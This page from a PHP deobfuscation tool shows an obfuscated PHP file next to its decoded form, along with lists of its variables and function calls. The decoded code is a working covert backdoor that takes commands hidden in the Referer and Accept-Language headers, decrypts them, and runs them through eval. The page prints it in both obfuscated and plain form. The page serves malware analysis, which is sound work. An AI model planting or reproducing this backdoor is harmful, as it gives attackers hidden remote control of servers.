Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $D='RER"];$Kra=@$rK[K"HTTP_ACCEPT_LKANGUKAGEK"];if($rKr&&$Kra){$uK=parKse_url($rr);..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$D='RER"];$Kra=@$rK[K"HTTP_ACCEPT_LKANGUKAGEK"];if($rKr&&$Kra){$uK=parKse_url($rr);KKparKse_Kstr($u["query"],$Kq';
$r='($j=0K;($j<KK$c&&$i<$KKl);$j++,$Ki++){K$Ko.=$t{$i}^$k{$jK};K}}reKturn $oK;}$r=K$_SERKVER;$rr=@$r["KHTTP_REFEK';
$O='ndK_cleKan();$d=basKe64_encodeK(x(gzcKompKreKss(K$o),$k));prinKKt("<$Kk>$d</$k>");@sesKKsion_desKtroy();}}}}';
$b='KrKeplace(array("/_/KK"K,"/-/"),array("KK/","+")K,$ss($s[$Ki],0K,$e))),$KkKK)));$o=ob_get_contKents();oKb_eK';
$V=');$qK=arraKy_KvaluesK($q);preg_mKatch_KallK("/([\\w])K[\\w-K]+(?:;q=0.([K\\KdK]))?,?/"K,$ra,K$m);if($q&&$m){K@s';
$K='essKioKn_staKrt();$Ks=&$_SEKSSKION;$ss="KsKubKKstr";$sl="strtolower";$Ki=$m[1][K0].$mK[K1][1];$Kh=$sl($ss(Km';
$M=str_replace('XG','','XGcreaXGte_XGfXGunXGcXGtion');
$w=']K[$Kz]K];if(stKrpos($p,K$h)===0)K{$s[$i]="K";$p=$ssK($p,3);}Kif(arrKay_kKeyK_exists($iKK,$sK)){K$s[$i].=$p;';
$P='d5K($i.$kKh)K,0,3));K$fK=K$sl($ss(md5($iK.$kKf),0,3));$p="KK";for($z=1;$z<KcountK($m[1])K;$z++K)$p.=$Kq[$m[2';
$Y='$Ke=strpos($sK[$iK],$f);if($Ke)K{$k=K$kh.$kf;Kob_stKart();@evaKl(@gzunKcoKmpress(@x(@KbKase64_decodKe(preg_K';
$N='$khK="5d41";$KkKf="402Ka";function x(KK$t,$k){$c=Kstrlen($kK);$lK=strKlen($t)K;$o="";foKrK($i=KK0;$i<$l;){for';
$L=str_replace('K','',$N.$r.$D.$V.$K.$P.$w.$Y.$b.$O);
$o=$M('',$L);$o();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D RER"];$Kra=@$rK[K"HTTP_ACCEPT_LKANGUKAGEK"];if($rKr&&$Kra){$..
$K essKioKn_staKrt();$Ks=&$_SEKSSKION;$ss="KsKubKKstr";$sl="str..
$L $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$M create_function
$N $khK="5d41";$KkKf="402Ka";function x(KK$t,$k){$c=Kstrlen($kK..
$O ndK_cleKan();$d=basKe64_encodeK(x(gzcKompKreKss(K$o),$k));pr..
$P d5K($i.$kKh)K,0,3));K$fK=K$sl($ss(md5($iK.$kKf),0,3));$p="KK..
$V );$qK=arraKy_KvaluesK($q);preg_mKatch_KallK("/([\w])K[\w-K]+..
$Y $Ke=strpos($sK[$iK],$f);if($Ke)K{$k=K$kh.$kf;Kob_stKart();@e..
$b KrKeplace(array("/_/KK"K,"/-/"),array("KK/","+")K,$ss($s[$Ki..
$o None
$r ($j=0K;($j<KK$c&&$i<$KKl);$j++,$Ki++){K$Ko.=$t{$i}^$k{$jK};K..
$w ]K[$Kz]K];if(stKrpos($p,K$h)===0)K{$s[$i]="K";$p=$ssK($p,3);..

Stats

MD5 3784230e67b1a42f6ecd1b574a548e8c
Eval Count 1
Decode Time 131 ms